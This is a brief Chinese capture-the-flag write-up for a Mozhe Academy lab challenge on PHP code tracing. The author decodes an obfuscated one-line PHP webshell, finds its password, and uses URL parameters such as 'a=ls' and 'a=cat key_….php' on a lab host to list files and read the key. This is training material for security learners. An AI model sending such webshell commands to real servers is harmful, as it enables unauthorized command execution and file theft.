墨者学院-PHP代码分析溯源(第4题)
2019-07-20 本文已影响0人
nohands_noob
靶场地址:
https://www.mozhe.cn/bug/detail/T0YyUmZRa1paTkJNQ0JmVWt3Sm13dz09bW96aGUmozhe
查看源码,这是一句话木马的加密
在线工具测试php代码,使用echo直接打印解密结果,可以看到密码是a
传递参数a=ls
http://219.153.49.228:44628/f.php?a=ls
传递参数a=cat key_208202970421431.php
http://219.153.49.228:44628/f.php?a=cat key_208202970421431.php
查看源码
发现key
